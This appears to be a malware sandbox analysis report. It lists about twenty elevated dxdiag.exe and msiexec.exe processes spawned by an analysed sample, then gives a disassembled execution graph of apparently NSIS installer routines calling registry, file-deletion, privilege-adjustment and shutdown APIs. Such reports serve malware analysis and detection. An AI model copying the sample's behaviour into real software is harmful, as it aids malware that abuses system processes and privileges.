                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:23
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:24
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:25
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:26
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:27
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:28
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:29
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:30
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:31
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:32
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:33
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:34
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:35
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\msiexec.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                              Imagebase:0x690000
                              File size:59'904 bytes
                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:36
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:37
                              Start time:02:22:35
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:38
                              Start time:02:22:36
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:39
                              Start time:02:22:36
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:40
                              Start time:02:22:36
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              General

                              Target ID:41
                              Start time:02:22:36
                              Start date:11/01/2025
                              Path:C:\Windows\SysWOW64\dxdiag.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\SysWOW64\dxdiag.exe"
                              Imagebase:0xe70000
                              File size:222'720 bytes
                              MD5 hash:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:26.8%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:17.1%
                                Total number of Nodes:1328
                                Total number of Limit Nodes:34
                                execution_graph 3034 4015c2 3035 402c5e 21 API calls 3034->3035 3036 4015c9 SetFileAttributesA 3035->3036 3037 4015db 3036->3037 3038 402543 3049 402c9e 3038->3049 3041 402c5e 21 API calls 3042 402556 3041->3042 3043 402560 RegQueryValueExA 3042->3043 3048 4027ed 3042->3048 3044 402580 3043->3044 3045 402586 RegCloseKey 3043->3045 3044->3045 3054 4061eb wsprintfA 3044->3054 3045->3048 3050 402c5e 21 API calls 3049->3050 3051 402cb5 3050->3051 3052 406113 RegOpenKeyExA 3051->3052 3053 40254d 3052->3053 3053->3041 3054->3045 3778 401a43 3779 402c5e 21 API calls 3778->3779 3780 401a4c ExpandEnvironmentStringsA 3779->3780 3781 401a60 3780->3781 3783 401a73 3780->3783 3782 401a65 lstrcmpA 3781->3782 3781->3783 3782->3783 3111 401744 3112 402c5e 21 API calls 3111->3112 3113 40174b SearchPathA 3112->3113 3114 401766 3113->3114 3789 401d44 3790 402c3c 21 API calls 3789->3790 3791 401d4b 3790->3791 3792 402c3c 21 API calls 3791->3792 3793 401d57 GetDlgItem 3792->3793 3794 40264d 3793->3794 3795 405345 3796 405355 3795->3796 3797 405369 3795->3797 3798 40535b 3796->3798 3807 4053b2 3796->3807 3799 405371 IsWindowVisible 3797->3799 3805 405388 3797->3805 3801 404379 SendMessageA 3798->3801 3802 40537e 3799->3802 3799->3807 3800 4053b7 CallWindowProcA 3803 405365 3800->3803 3801->3803 3808 404c80 SendMessageA 3802->3808 3805->3800 3813 404d00 3805->3813 3807->3800 3809 404ca3 GetMessagePos ScreenToClient SendMessageA 3808->3809 3810 404cdf SendMessageA 3808->3810 3811 404cd7 3809->3811 3812 404cdc 3809->3812 3810->3811 3811->3805 3812->3810 3822 40628d lstrcpynA 3813->3822 3815 404d13 3823 4061eb wsprintfA 3815->3823 3817 404d1d 3818 40140b 2 API calls 3817->3818 3819 404d26 3818->3819 3824 40628d lstrcpynA 3819->3824 3821 404d2d 3821->3807 3822->3815 3823->3817 3824->3821 3825 402ac5 SendMessageA 3826 402aea 3825->3826 3827 402adf InvalidateRect 3825->3827 3827->3826 3115 4023c9 3116 4023d1 3115->3116 3117 4023d7 3115->3117 3119 402c5e 21 API calls 3116->3119 3118 4023e7 3117->3118 3120 402c5e 21 API calls 3117->3120 3121 402c5e 21 API calls 3118->3121 3123 4023f5 3118->3123 3119->3117 3120->3118 3121->3123 3122 402c5e 21 API calls 3124 4023fe WritePrivateProfileStringA 3122->3124 3123->3122 3126 4020ca 3127 4020dc 3126->3127 3137 40218a 3126->3137 3128 402c5e 21 API calls 3127->3128 3130 4020e3 3128->3130 3129 401423 28 API calls 3135 40230f 3129->3135 3131 402c5e 21 API calls 3130->3131 3132 4020ec 3131->3132 3133 402101 LoadLibraryExA 3132->3133 3134 4020f4 GetModuleHandleA 3132->3134 3136 402111 GetProcAddress 3133->3136 3133->3137 3134->3133 3134->3136 3138 402120 3136->3138 3139 40215d 3136->3139 3137->3129 3141 401423 28 API calls 3138->3141 3142 402130 3138->3142 3140 4053d1 28 API calls 3139->3140 3140->3142 3141->3142 3142->3135 3143 40217e FreeLibrary 3142->3143 3143->3135 3828 402e4a 3829 402e72 3828->3829 3830 402e59 SetTimer 3828->3830 3831 402ec7 3829->3831 3832 402e8c MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3829->3832 3830->3829 3832->3831 3836 40244e 3837 402480 3836->3837 3838 402455 3836->3838 3840 402c5e 21 API calls 3837->3840 3839 402c9e 21 API calls 3838->3839 3842 40245c 3839->3842 3841 402487 3840->3841 3847 402d1c 3841->3847 3844 402494 3842->3844 3845 402c5e 21 API calls 3842->3845 3846 40246d RegDeleteValueA RegCloseKey 3845->3846 3846->3844 3848 402d28 3847->3848 3849 402d2f 3847->3849 3848->3844 3849->3848 3851 402d60 3849->3851 3852 406113 RegOpenKeyExA 3851->3852 3853 402d8e 3852->3853 3854 402d9e RegEnumValueA 3853->3854 3861 402e38 3853->3861 3863 402dc1 3853->3863 3855 402e28 RegCloseKey 3854->3855 3854->3863 3855->3861 3856 402dfd RegEnumKeyA 3857 402e06 RegCloseKey 3856->3857 3856->3863 3858 4066b5 5 API calls 3857->3858 3859 402e16 3858->3859 3859->3861 3862 402e1a RegDeleteKeyA 3859->3862 3860 402d60 6 API calls 3860->3863 3861->3848 3862->3861 3863->3855 3863->3856 3863->3857 3863->3860 3864 4027cf 3865 402c5e 21 API calls 3864->3865 3866 4027d6 FindFirstFileA 3865->3866 3867 4027f9 3866->3867 3868 4027e9 3866->3868 3872 4061eb wsprintfA 3867->3872 3870 402800 3873 40628d lstrcpynA 3870->3873 3872->3870 3873->3868 3306 401c53 3307 402c3c 21 API calls 3306->3307 3308 401c5a 3307->3308 3309 402c3c 21 API calls 3308->3309 3310 401c67 3309->3310 3311 402c5e 21 API calls 3310->3311 3312 401c7c 3310->3312 3311->3312 3313 401c8c 3312->3313 3314 402c5e 21 API calls 3312->3314 3315 401ce3 3313->3315 3316 401c97 3313->3316 3314->3313 3317 402c5e 21 API calls 3315->3317 3318 402c3c 21 API calls 3316->3318 3319 401ce8 3317->3319 3320 401c9c 3318->3320 3322 402c5e 21 API calls 3319->3322 3321 402c3c 21 API calls 3320->3321 3323 401ca8 3321->3323 3324 401cf1 FindWindowExA 3322->3324 3325 401cd3 SendMessageA 3323->3325 3326 401cb5 SendMessageTimeoutA 3323->3326 3327 401d0f 3324->3327 3325->3327 3326->3327 3874 402653 3875 402658 3874->3875 3876 40266c 3874->3876 3877 402c3c 21 API calls 3875->3877 3878 402c5e 21 API calls 3876->3878 3880 402661 3877->3880 3879 402673 lstrlenA 3878->3879 3879->3880 3881 402695 3880->3881 3882 405ec7 WriteFile 3880->3882 3882->3881 3883 403a54 3884 403a5f 3883->3884 3885 403a63 3884->3885 3886 403a66 GlobalAlloc 3884->3886 3886->3885 3887 4014d6 3888 402c3c 21 API calls 3887->3888 3889 4014dc Sleep 3888->3889 3891 402aea 3889->3891 3427 401957 3428 401959 3427->3428 3429 402c5e 21 API calls 3428->3429 3430 40195e 3429->3430 3433 405a4f 3430->3433 3470 405d0d 3433->3470 3436 405a77 DeleteFileA 3465 401967 3436->3465 3437 405a8e 3440 405bbc 3437->3440 3484 40628d lstrcpynA 3437->3484 3439 405ab4 3441 405ac7 3439->3441 3442 405aba lstrcatA 3439->3442 3444 406620 2 API calls 3440->3444 3440->3465 3485 405c66 lstrlenA 3441->3485 3445 405acd 3442->3445 3447 405be0 3444->3447 3446 405adb lstrcatA 3445->3446 3448 405ae6 lstrlenA FindFirstFileA 3445->3448 3446->3448 3447->3465 3498 405c1f lstrlenA CharPrevA 3447->3498 3448->3440 3468 405b0a 3448->3468 3450 405c4a CharNextA 3450->3468 3452 405a07 5 API calls 3453 405bf6 3452->3453 3454 405c10 3453->3454 3455 405bfa 3453->3455 3457 4053d1 28 API calls 3454->3457 3459 4053d1 28 API calls 3455->3459 3455->3465 3457->3465 3458 405b9b FindNextFileA 3460 405bb3 FindClose 3458->3460 3458->3468 3461 405c07 3459->3461 3460->3440 3462 406066 40 API calls 3461->3462 3462->3465 3464 405a4f 64 API calls 3464->3468 3466 4053d1 28 API calls 3466->3458 3467 4053d1 28 API calls 3467->3468 3468->3450 3468->3458 3468->3464 3468->3466 3468->3467 3469 406066 40 API calls 3468->3469 3489 40628d lstrcpynA 3468->3489 3490 405a07 3468->3490 3469->3468 3501 40628d lstrcpynA 3470->3501 3472 405d1e 3473 405cb8 4 API calls 3472->3473 3475 405d24 3473->3475 3474 405a6f 3474->3436 3474->3437 3475->3474 3476 406587 5 API calls 3475->3476 3482 405d34 3476->3482 3477 405d5f lstrlenA 3478 405d6a 3477->3478 3477->3482 3479 405c1f 3 API calls 3478->3479 3481 405d6f GetFileAttributesA 3479->3481 3480 406620 2 API calls 3480->3482 3481->3474 3482->3474 3482->3477 3482->3480 3483 405c66 2 API calls 3482->3483 3483->3477 3484->3439 3486 405c73 3485->3486 3487 405c84 3486->3487 3488 405c78 CharPrevA 3486->3488 3487->3445 3488->3486 3488->3487 3489->3468 3502 405dfb GetFileAttributesA 3490->3502 3493 405a22 RemoveDirectoryA 3496 405a30 3493->3496 3494 405a2a DeleteFileA 3494->3496 3495 405a34 3495->3468 3496->3495 3497 405a40 SetFileAttributesA 3496->3497 3497->3495 3499 405bea 3498->3499 3500 405c39 lstrcatA 3498->3500 3499->3452 3500->3499 3501->3472 3503 405a13 3502->3503 3504 405e0d SetFileAttributesA 3502->3504 3503->3493 3503->3494 3503->3495 3504->3503 3505 4033d8 SetErrorMode GetVersionExA 3506 40342a GetVersionExA 3505->3506 3508 403469 3505->3508 3507 403446 3506->3507 3506->3508 3507->3508 3509 4034ed 3508->3509 3510 4066b5 5 API calls 3508->3510 3511 406647 3 API calls 3509->3511 3510->3509 3512 403503 lstrlenA 3511->3512 3512->3509 3513 403513 3512->3513 3514 4066b5 5 API calls 3513->3514 3515 40351a 3514->3515 3516 4066b5 5 API calls 3515->3516 3517 403521 3516->3517 3518 4066b5 5 API calls 3517->3518 3519 40352d #17 OleInitialize SHGetFileInfoA 3518->3519 3594 40628d lstrcpynA 3519->3594 3522 40357b GetCommandLineA 3595 40628d lstrcpynA 3522->3595 3524 40358d 3525 405c4a CharNextA 3524->3525 3526 4035b4 CharNextA 3525->3526 3532 4035c3 3526->3532 3527 403689 3528 40369d GetTempPathA 3527->3528 3596 4033a7 3528->3596 3530 4036b5 3533 4036b9 GetWindowsDirectoryA lstrcatA 3530->3533 3534 40370f DeleteFileA 3530->3534 3531 405c4a CharNextA 3531->3532 3532->3527 3532->3531 3537 40368b 3532->3537 3536 4033a7 12 API calls 3533->3536 3606 402f31 GetTickCount GetModuleFileNameA 3534->3606 3539 4036d5 3536->3539 3690 40628d lstrcpynA 3537->3690 3538 403722 3541 4037ba ExitProcess OleUninitialize 3538->3541 3550 405c4a CharNextA 3538->3550 3576 4037a7 3538->3576 3539->3534 3540 4036d9 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3539->3540 3543 4033a7 12 API calls 3540->3543 3544 4037d1 3541->3544 3545 403928 3541->3545 3546 403707 3543->3546 3693 4059a3 3544->3693 3548 403930 GetCurrentProcess OpenProcessToken 3545->3548 3549 4039a6 ExitProcess 3545->3549 3546->3534 3546->3541 3554 403976 3548->3554 3555 403947 LookupPrivilegeValueA AdjustTokenPrivileges 3548->3555 3558 40373c 3550->3558 3553 4037b7 3553->3541 3557 4066b5 5 API calls 3554->3557 3555->3554 3559 40397d 3557->3559 3560 403781 3558->3560 3561 4037e6 3558->3561 3562 403992 ExitWindowsEx 3559->3562 3565 40399f 3559->3565 3564 405d0d 18 API calls 3560->3564 3563 40590e 5 API calls 3561->3563 3562->3549 3562->3565 3567 4037eb lstrlenA 3563->3567 3566 40378d 3564->3566 3569 40140b 2 API calls 3565->3569 3566->3541 3691 40628d lstrcpynA 3566->3691 3697 40628d lstrcpynA 3567->3697 3569->3549 3570 403803 3572 40381b 3570->3572 3698 40628d lstrcpynA 3570->3698 3577 403839 wsprintfA 3572->3577 3593 403867 3572->3593 3573 40379c 3692 40628d lstrcpynA 3573->3692 3634 403a96 3576->3634 3578 406320 21 API calls 3577->3578 3578->3572 3579 405897 2 API calls 3579->3593 3580 4058f1 2 API calls 3580->3593 3581 403877 GetFileAttributesA 3583 403883 DeleteFileA 3581->3583 3581->3593 3582 4038af SetCurrentDirectoryA 3584 406066 40 API calls 3582->3584 3583->3593 3586 4038be CopyFileA 3584->3586 3585 4038aa 3585->3541 3586->3541 3586->3593 3587 405a4f 71 API calls 3587->3593 3588 406066 40 API calls 3588->3593 3589 406320 21 API calls 3589->3593 3590 405926 2 API calls 3590->3593 3591 403918 CloseHandle 3591->3541 3592 406620 2 API calls 3592->3593 3593->3541 3593->3572 3593->3577 3593->3579 3593->3580 3593->3581 3593->3582 3593->3585 3593->3587 3593->3588 3593->3589 3593->3590 3593->3591 3593->3592 3594->3522 3595->3524 3597 406587 5 API calls 3596->3597 3599 4033b3 3597->3599 3598 4033bd 3598->3530 3599->3598 3600 405c1f 3 API calls 3599->3600 3601 4033c5 3600->3601 3602 4058f1 2 API calls 3601->3602 3603 4033cb 3602->3603 3604 405e4f 2 API calls 3603->3604 3605 4033d6 3604->3605 3605->3530 3699 405e20 GetFileAttributesA CreateFileA 3606->3699 3608 402f71 3628 402f81 3608->3628 3700 40628d lstrcpynA 3608->3700 3610 402f97 3611 405c66 2 API calls 3610->3611 3612 402f9d 3611->3612 3701 40628d lstrcpynA 3612->3701 3614 402fa8 GetFileSize 3615 4030a2 3614->3615 3626 402fbf 3614->3626 3702 402ecd 3615->3702 3617 4030ab 3619 4030db GlobalAlloc 3617->3619 3617->3628 3714 403390 SetFilePointer 3617->3714 3618 40337a ReadFile 3618->3626 3713 403390 SetFilePointer 3619->3713 3620 40310e 3624 402ecd 6 API calls 3620->3624 3623 4030f6 3627 403168 35 API calls 3623->3627 3624->3628 3625 4030c4 3629 40337a ReadFile 3625->3629 3626->3615 3626->3618 3626->3620 3626->3628 3630 402ecd 6 API calls 3626->3630 3632 403102 3627->3632 3628->3538 3631 4030cf 3629->3631 3630->3626 3631->3619 3631->3628 3632->3628 3632->3632 3633 40313f SetFilePointer 3632->3633 3633->3628 3635 4066b5 5 API calls 3634->3635 3636 403aaa 3635->3636 3637 403ab0 3636->3637 3638 403ac2 3636->3638 3723 4061eb wsprintfA 3637->3723 3639 406174 3 API calls 3638->3639 3640 403aed 3639->3640 3642 403b0b lstrcatA 3640->3642 3644 406174 3 API calls 3640->3644 3643 403ac0 3642->3643 3715 403d5b 3643->3715 3644->3642 3647 405d0d 18 API calls 3648 403b3d 3647->3648 3649 403bc6 3648->3649 3651 406174 3 API calls 3648->3651 3650 405d0d 18 API calls 3649->3650 3652 403bcc 3650->3652 3653 403b69 3651->3653 3654 403bdc LoadImageA 3652->3654 3655 406320 21 API calls 3652->3655 3653->3649 3658 403b85 lstrlenA 3653->3658 3662 405c4a CharNextA 3653->3662 3656 403c82 3654->3656 3657 403c03 RegisterClassA 3654->3657 3655->3654 3661 40140b 2 API calls 3656->3661 3659 403c8c 3657->3659 3660 403c39 SystemParametersInfoA CreateWindowExA 3657->3660 3663 403b93 lstrcmpiA 3658->3663 3664 403bb9 3658->3664 3659->3553 3660->3656 3665 403c88 3661->3665 3667 403b83 3662->3667 3663->3664 3668 403ba3 GetFileAttributesA 3663->3668 3666 405c1f 3 API calls 3664->3666 3665->3659 3669 403d5b 22 API calls 3665->3669 3670 403bbf 3666->3670 3667->3658 3671 403baf 3668->3671 3672 403c99 3669->3672 3724 40628d lstrcpynA 3670->3724 3671->3664 3674 405c66 2 API calls 3671->3674 3675 403ca5 ShowWindow 3672->3675 3676 403d28 3672->3676 3674->3664 3678 406647 3 API calls 3675->3678 3677 4054a3 5 API calls 3676->3677 3679 403d2e 3677->3679 3680 403cbd 3678->3680 3681 403d32 3679->3681 3682 403d4a 3679->3682 3683 403ccb GetClassInfoA 3680->3683 3685 406647 3 API calls 3680->3685 3681->3659 3688 40140b 2 API calls 3681->3688 3684 40140b 2 API calls 3682->3684 3686 403cf5 DialogBoxParamA 3683->3686 3687 403cdf GetClassInfoA RegisterClassA 3683->3687 3684->3659 3685->3683 3689 40140b 2 API calls 3686->3689 3687->3686 3688->3659 3689->3659 3690->3528 3691->3573 3692->3576 3694 4059b8 3693->3694 3695 4037de ExitProcess 3694->3695 3696 4059cc MessageBoxIndirectA 3694->3696 3696->3695 3697->3570 3698->3572 3699->3608 3700->3610 3701->3614 3703 402ed6 3702->3703 3704 402eee 3702->3704 3705 402ee6 3703->3705 3706 402edf DestroyWindow 3703->3706 3707 402ef6 3704->3707 3708 402efe GetTickCount 3704->3708 3705->3617 3706->3705 3709 4066f1 2 API calls 3707->3709 3710 402f0c CreateDialogParamA ShowWindow 3708->3710 3711 402f2f 3708->3711 3712 402efc 3709->3712 3710->3711 3711->3617 3712->3617 3713->3623 3714->3625 3716 403d6f 3715->3716 3725 4061eb wsprintfA 3716->3725 3718 403de0 3719 403e14 22 API calls 3718->3719 3721 403de5 3719->3721 3720 403b1b 3720->3647 3721->3720 3722 406320 21 API calls 3721->3722 3722->3721 3723->3643 3724->3649 3725->3718 3892 402758 3893 402a6c 3892->3893 3894 40275f 3892->3894 3895 402c3c 21 API calls 3894->3895 3896 402766 3895->3896 3897 402775 SetFilePointer 3896->3897 3897->3893 3898 402785 3897->3898 3900 4061eb wsprintfA 3898->3900 3900->3893 3901 401e5a GetDC 3902 402c3c 21 API calls 3901->3902 3903 401e6c GetDeviceCaps MulDiv ReleaseDC 3902->3903 3904 402c3c 21 API calls 3903->3904 3905 401e9d 3904->3905 3906 406320 21 API calls 3905->3906 3907 401eda CreateFontIndirectA 3906->3907 3908 40264d 3907->3908 2900 4015e0 2919 402c5e 2900->2919 2904 401649 2906 401677 2904->2906 2907 40164e 2904->2907 2910 401423 28 API calls 2906->2910 2941 401423 2907->2941 2915 40166f 2910->2915 2914 401660 SetCurrentDirectoryA 2914->2915 2916 401631 GetFileAttributesA 2918 4015ef 2916->2918 2918->2904 2918->2916 2931 405c4a 2918->2931 2935 40590e 2918->2935 2938 405897 CreateDirectoryA 2918->2938 2945 4058f1 CreateDirectoryA 2918->2945 2920 402c6a 2919->2920 2948 406320 2920->2948 2923 4015e7 2925 405cb8 CharNextA CharNextA 2923->2925 2926 405ce3 2925->2926 2927 405cd3 2925->2927 2929 405c4a CharNextA 2926->2929 2930 405d03 2926->2930 2927->2926 2928 405cde CharNextA 2927->2928 2928->2930 2929->2926 2930->2918 2932 405c50 2931->2932 2933 405c63 2932->2933 2934 405c56 CharNextA 2932->2934 2933->2918 2934->2932 2936 4066b5 5 API calls 2935->2936 2937 405915 2936->2937 2937->2918 2939 4058e3 2938->2939 2940 4058e7 GetLastError 2938->2940 2939->2918 2940->2939 2995 4053d1 2941->2995 2944 40628d lstrcpynA 2944->2914 2946 405901 2945->2946 2947 405905 GetLastError 2945->2947 2946->2918 2947->2946 2963 40632d 2948->2963 2949 40656e 2950 402c8b 2949->2950 2987 40628d lstrcpynA 2949->2987 2950->2923 2965 406587 2950->2965 2952 406545 lstrlenA 2952->2963 2955 406320 15 API calls 2955->2952 2957 40644c GetSystemDirectoryA 2957->2963 2958 406462 GetWindowsDirectoryA 2958->2963 2959 406587 5 API calls 2959->2963 2960 406320 15 API calls 2960->2963 2961 4064ee lstrcatA 2961->2963 2963->2949 2963->2952 2963->2955 2963->2957 2963->2958 2963->2959 2963->2960 2963->2961 2964 4064c5 SHGetPathFromIDListA CoTaskMemFree 2963->2964 2974 406174 2963->2974 2979 4066b5 GetModuleHandleA 2963->2979 2985 4061eb wsprintfA 2963->2985 2986 40628d lstrcpynA 2963->2986 2964->2963 2971 406593 2965->2971 2966 4065fb 2967 4065ff CharPrevA 2966->2967 2969 40661a 2966->2969 2967->2966 2968 4065f0 CharNextA 2968->2966 2968->2971 2969->2923 2970 405c4a CharNextA 2970->2971 2971->2966 2971->2968 2971->2970 2972 4065de CharNextA 2971->2972 2973 4065eb CharNextA 2971->2973 2972->2971 2973->2968 2988 406113 2974->2988 2977 4061a8 RegQueryValueExA RegCloseKey 2978 4061d7 2977->2978 2978->2963 2980 4066d1 2979->2980 2981 4066db GetProcAddress 2979->2981 2992 406647 GetSystemDirectoryA 2980->2992 2984 4066ea 2981->2984 2983 4066d7 2983->2981 2983->2984 2984->2963 2985->2963 2986->2963 2987->2950 2989 406122 2988->2989 2990 406126 2989->2990 2991 40612b RegOpenKeyExA 2989->2991 2990->2977 2990->2978 2991->2990 2993 406669 wsprintfA LoadLibraryExA 2992->2993 2993->2983 2996 4053ec 2995->2996 3005 401431 2995->3005 2997 405409 lstrlenA 2996->2997 2998 406320 21 API calls 2996->2998 2999 405432 2997->2999 3000 405417 lstrlenA 2997->3000 2998->2997 3002 405445 2999->3002 3003 405438 SetWindowTextA 2999->3003 3001 405429 lstrcatA 3000->3001 3000->3005 3001->2999 3004 40544b SendMessageA SendMessageA SendMessageA 3002->3004 3002->3005 3003->3002 3004->3005 3005->2944 3909 4016e0 3910 402c5e 21 API calls 3909->3910 3911 4016e6 GetFullPathNameA 3910->3911 3912 40171e 3911->3912 3913 4016fd 3911->3913 3914 401732 GetShortPathNameA 3912->3914 3915 402aea 3912->3915 3913->3912 3916 406620 2 API calls 3913->3916 3914->3915 3917 40170e 3916->3917 3917->3912 3919 40628d lstrcpynA 3917->3919 3919->3912 3920 404463 lstrcpynA lstrlenA 3125 405969 ShellExecuteExA 3144 401eea 3145 402c3c 21 API calls 3144->3145 3146 401ef0 3145->3146 3147 402c3c 21 API calls 3146->3147 3148 401efc 3147->3148 3149 401f13 EnableWindow 3148->3149 3150 401f08 ShowWindow 3148->3150 3151 402aea 3149->3151 3150->3151 3152 40176b 3153 402c5e 21 API calls 3152->3153 3154 401772 3153->3154 3158 